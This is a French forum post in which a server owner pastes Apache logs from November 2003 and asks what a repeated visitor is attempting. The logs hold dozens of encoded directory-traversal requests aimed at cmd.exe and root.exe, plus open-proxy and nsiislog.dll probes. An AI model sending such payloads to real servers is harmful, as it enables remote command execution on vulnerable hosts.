Par hasard j'ai chécker mes logs apache et voici ce que je trouve
Code :
- 217.128.177.10 - - [17/Nov/2003:03:44:16 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:16 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:17 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:18 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:19 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:19 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
- 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:20 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:21 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:22 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:03:44:22 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:27 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:28 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:29 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:30 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
- 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:31 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:32 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:32 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:33 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:34 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:04:55:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:07:01:56 +0000] "GET http://www.yahoo.com/ HTTP/1.1" 200 1456 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
- 217.128.177.10 - - [17/Nov/2003:08:02:27 +0000] "GET /scripts/nsiislog.dll" 404 326 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:26 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:26 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:27 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 361 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:28 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/$
- 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:29 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:30 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:30 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 334 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:11:27:31 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 344 "-" "-"
- 217.128.177.10 - - [17/Nov/2003:13:02:22 +0000] "GET http://www.yahoo.com/ HTTP/1.1" 200 1456 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
|
Le pire c'est que le mec dopit etre en IP fixe car j'ai toujours la meme adresse Ip depuis 3h à 11 heures dans mes logs Iptables .
Donc soit le mec est con soit il cherche à se faire enlever son ADSL .
Par contre , par curiosité , j'aimerais bien savoir ce qu'il essaye de faire